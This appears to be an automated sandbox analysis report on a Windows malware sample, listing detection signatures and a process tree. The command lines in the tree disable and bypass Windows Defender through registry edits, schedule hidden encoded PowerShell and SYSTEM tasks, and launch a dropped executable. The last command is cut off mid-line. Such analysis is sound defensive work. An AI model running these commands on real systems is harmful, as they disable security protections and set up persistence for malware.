Edit tour
Windows
Analysis Report
file.exe
Overview
General Information
Detection
Score: | 80 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Sigma detected: Schedule system process
Multi AV Scanner detection for dropped file
Uses cmd line tools excessively to alter registry or file data
Encrypted powershell cmdline option found
Very long command line found
Suspicious powershell command line found
Modifies Group Policy settings
Uses schtasks.exe or at.exe to add and modify task schedules
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Deletes files inside the Windows folder
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Creates files inside the system directory
PE file contains sections with non-standard names
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Too many similar processes found
Creates job files (autostart)
Contains functionality to dynamically determine API calls
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Contains capabilities to detect virtual machines
Uses reg.exe to modify the Windows registry
Dropped file seen in connection with other malware
Creates a process in suspended mode (likely to inject code)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Classification
- System is w10x64
- file.exe (PID: 5820 cmdline:
C:\Users\u ser\Deskto p\file.exe MD5: 2D9B13584AB871C81FF24C473468CFFA) - Install.exe (PID: 5784 cmdline:
.\Install. exe MD5: 3ADC95B09B9644E908114624326E8D0B) - Install.exe (PID: 5796 cmdline:
.\Install. exe /S /si te_id "525 403" MD5: 6F52A47480DAE7C97A64DD5AEBB8E426) - forfiles.exe (PID: 5888 cmdline:
C:\Windows \System32\ forfiles.e xe" /p c:\ windows\sy stem32 /m cmd.exe /c "cmd /C R EG ADD \"H KLM\SOFTWA RE\Policie s\Microsof t\Windows Defender\E xclusions\ Extensions \" /f /v \ "exe\" /t REG_SZ /d 0 /reg:32& REG ADD \" HKLM\SOFTW ARE\Polici es\Microso ft\Windows Defender\ Exclusions \Extension s\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64 & MD5: 4329CB18F8F74CC8DDE2C858BB80E5D8) - conhost.exe (PID: 5872 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) - cmd.exe (PID: 5960 cmdline:
/C REG ADD "HKLM\SOF TWARE\Poli cies\Micro soft\Windo ws Defende r\Exclusio ns\Extensi ons" /f /v "exe" /t REG_SZ /d 0 /reg:32& REG ADD "H KLM\SOFTWA RE\Policie s\Microsof t\Windows Defender\E xclusions\ Extensions " /f /v "e xe" /t REG _SZ /d 0 / reg:64& MD5: F3BDBE3BB6F734E357235F4D5898582D) - reg.exe (PID: 5140 cmdline:
REG ADD "H KLM\SOFTWA RE\Policie s\Microsof t\Windows Defender\E xclusions\ Extensions " /f /v "e xe" /t REG _SZ /d 0 / reg:32 MD5: CEE2A7E57DF2A159A065A34913A055C2) - reg.exe (PID: 4496 cmdline:
REG ADD "H KLM\SOFTWA RE\Policie s\Microsof t\Windows Defender\E xclusions\ Extensions " /f /v "e xe" /t REG _SZ /d 0 / reg:64 MD5: CEE2A7E57DF2A159A065A34913A055C2) - forfiles.exe (PID: 5868 cmdline:
C:\Windows \System32\ forfiles.e xe" /p c:\ windows\sy stem32 /m cmd.exe /c "cmd /C R EG ADD \"H KLM\SOFTWA RE\Policie s\Microsof t\Windows Defender\S pynet\" /f /v \"SpyN etReportin g\" /t REG _DWORD /d 0 /reg:32& REG ADD \" HKLM\SOFTW ARE\Polici es\Microso ft\Windows Defender\ Spynet\" / f /v \"Spy NetReporti ng\" /t RE G_DWORD /d 0 /reg:64 & MD5: 4329CB18F8F74CC8DDE2C858BB80E5D8) - conhost.exe (PID: 5600 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) - cmd.exe (PID: 4544 cmdline:
/C REG ADD "HKLM\SOF TWARE\Poli cies\Micro soft\Windo ws Defende r\Spynet" /f /v "Spy NetReporti ng" /t REG _DWORD /d 0 /reg:32& REG ADD "H KLM\SOFTWA RE\Policie s\Microsof t\Windows Defender\S pynet" /f /v "SpyNet Reporting" /t REG_DW ORD /d 0 / reg:64& MD5: F3BDBE3BB6F734E357235F4D5898582D) - reg.exe (PID: 4668 cmdline:
REG ADD "H KLM\SOFTWA RE\Policie s\Microsof t\Windows Defender\S pynet" /f /v "SpyNet Reporting" /t REG_DW ORD /d 0 / reg:32 MD5: CEE2A7E57DF2A159A065A34913A055C2) - reg.exe (PID: 1332 cmdline:
REG ADD "H KLM\SOFTWA RE\Policie s\Microsof t\Windows Defender\S pynet" /f /v "SpyNet Reporting" /t REG_DW ORD /d 0 / reg:64 MD5: CEE2A7E57DF2A159A065A34913A055C2) - schtasks.exe (PID: 1252 cmdline:
schtasks / CREATE /TN "gUpzuvmW b" /SC onc e /ST 15:2 8:53 /F /R U "user" / TR "powers hell -Wind owStyle Hi dden -Enco dedCommand cwB0AGEAc gB0AC0AcAB yAG8AYwBlA HMAcwAgAC0 AVwBpAG4AZ ABvAHcAUwB 0AHkAbABlA CAASABpAGQ AZABlAG4AI ABnAHAAdQB wAGQAYQB0A GUALgBlAHg AZQAgAC8AZ gBvAHIAYwB lAA==" MD5: 15FF7D8324231381BAD48A052F85DF04) - conhost.exe (PID: 1364 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) - schtasks.exe (PID: 1244 cmdline:
schtasks / run /I /tn "gUpzuvmW b" MD5: 15FF7D8324231381BAD48A052F85DF04) - conhost.exe (PID: 4136 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) - schtasks.exe (PID: 5956 cmdline:
schtasks / DELETE /F /TN "gUpzu vmWb" MD5: 15FF7D8324231381BAD48A052F85DF04) - conhost.exe (PID: 5924 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) - schtasks.exe (PID: 5176 cmdline:
schtasks / CREATE /TN "bGZpGlqv DNKjraWjlZ " /SC once /ST 17:15 :00 /RU "S YSTEM" /TR "\"C:\Use rs\user\Ap pData\Loca l\Temp\LhL AIbjVjtdXS eCjh\NRKtM pzzQqeBbPa \fdKxpPd.e xe\" d8 /s ite_id 525 403 /S" /V 1 /F MD5: 15FF7D8324231381BAD48A052F85DF04) - conhost.exe (PID: 2820 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
- powershell.exe (PID: 4744 cmdline:
C:\Windows \System32\ WindowsPow erShell\v1 .0\powersh ell.EXE -W indowStyle Hidden -E ncodedComm and cwB0AG EAcgB0AC0A cAByAG8AYw BlAHMAcwAg AC0AVwBpAG 4AZABvAHcA UwB0AHkAbA BlACAASABp AGQAZABlAG 4AIABnAHAA dQBwAGQAYQ B0AGUALgBl AHgAZQAgAC 8AZgBvAHIA YwBlAA== MD5: 95000560239032BC68B4C2FDFCDEF913) - conhost.exe (PID: 5948 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) - gpupdate.exe (PID: 1348 cmdline:
"C:\Window s\system32 \gpupdate. exe" /forc e MD5: 47C68FE26B0188CDD80F744F7405FF26) - conhost.exe (PID: 1544 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
- fdKxpPd.exe (PID: 5880 cmdline:
C:\Users\u ser\AppDat a\Local\Te mp\LhLAIbj VjtdXSeCjh \NRKtMpzzQ qeBbPa\fdK xpPd.exe d 8 /site_id 525403 /S MD5: 6F52A47480DAE7C97A64DD5AEBB8E426) - powershell.exe (PID: 5976 cmdline:
powershell "cmd /C R EG ADD \"H KLM\SOFTWA RE\Policie s\Microsof t\Windows Defender\T hreats\Thr eatIDDefau ltAction\" /f /v \"2 25451\" /t REG_SZ /d 6 /reg:32 ;REG ADD \ "HKLM\SOFT WARE\Polic ies\Micros oft\Window s Defender \Threats\T hreatIDDef aultAction \" /f /v \ "225451\" /t REG_SZ /d 6 /reg: 64;REG ADD \"HKLM\SO FTWARE\Pol icies\Micr osoft\Wind ows Defend er\Threats \ThreatIDD efaultActi on\" /f /v \"256596\ " /t REG_S Z /d 6 /re g:32;REG A DD \"HKLM\ SOFTWARE\P olicies\Mi crosoft\Wi ndows Defe nder\Threa ts\ThreatI DDefaultAc tion\" /f /v \"25659 6\" /t REG _SZ /d 6 / reg:64;REG ADD \"HKL M\SOFTWARE \Policies\ Microsoft\ Windows De fender\Thr eats\Threa tIDDefault Action\" / f /v \"242 872\" /t R EG_SZ /d 6 /reg:32;R EG ADD \"H KLM\SOFTWA RE\Policie s\Microsof t\Windows Defender\T hreats\Thr eatIDDefau ltAction\" /f /v \"2 42872\" /t REG_SZ /d 6 /reg:64 ;REG ADD \ "HKLM\SOFT WARE\Polic ies\Micros oft\Window s Defender \Threats\T hreatIDDef aultAction \" /f /v \ "214774937 3\" /t REG _SZ /d 6 / reg:32;REG ADD \"HKL M\SOFTWARE \Policies\ Microsoft\ Windows De fender\Thr eats\Threa tIDDefault Action\" / f /v \"214 7749373\" /t REG_SZ /d 6 /reg: 64;REG ADD \"HKLM\SO FTWARE\Pol icies\Micr osoft\Wind ows Defend er\Threats \ThreatIDD efaultActi on\" /f /v \"2147807 942\" /t R EG_SZ /d 6 /reg:32;R EG ADD \"H KLM\SOFTWA RE\Policie s\Microsof t\Windows Defender\T hreats\Thr eatIDDefau ltAction\" /f /v \"2 147807942\ " /t REG_S Z /d 6 /re g:64;REG A DD \"HKLM\ SOFTWARE\P olicies\Mi crosoft\Wi ndows Defe nder\Threa ts\ThreatI DDefaultAc tion\" /f /v \"21477 35735\" /t REG_SZ /d 6 /reg:32 ;REG ADD \ "HKLM\SOFT WARE\Polic ies\Micros oft\Window s Defender \Threats\T hreatIDDef aultAction \" /f /v \ "214773573 5\" /t REG _SZ /d 6 / reg:64;REG ADD \"HKL M\SOFTWARE \Policies\ Microsoft\ Windows De fender\Thr eats\Threa tIDDefault Action\" / f /v \"214 7737010\" /t REG_SZ /d 6 /reg: 32;REG ADD \"HKLM\SO FTWARE\Pol icies\Micr osoft\Wind ows Defend er\Threats \ThreatIDD efaultActi on\" /f /v \"2147737 010\" /t R EG_SZ /d 6 /reg:64;R EG ADD \"H KLM\SOFTWA RE\Policie s\Microsof t\Windows Defender\T hreats\Thr eatIDDefau ltAction\" /f /v \"2 147737007\ " /t REG_S Z /d 6 /re g:32;REG A DD \"HKLM\ SOFTWARE\P olicies\Mi crosoft\Wi ndows Defe nder\Threa ts\ThreatI DDefaultAc tion\" /f /v \"21477 37007\" /t REG_SZ /d 6 /reg:64 ;REG ADD \ "HKLM\SOFT WARE\Polic ies\Micros oft\Window s Defender \Threats\T hreatIDDef aultAction \" /f /v \ "214773750 3\" /t REG _SZ /d 6 / reg:32;REG ADD \"HKL M\SOFTWARE \Policies\ Microsoft\ Windows De fender\Thr eats\Threa tIDDefault Action\" / f /v \"214 7737503\" /t REG_SZ /d 6 /reg: 64;REG ADD \"HKLM\SO FTWARE\Pol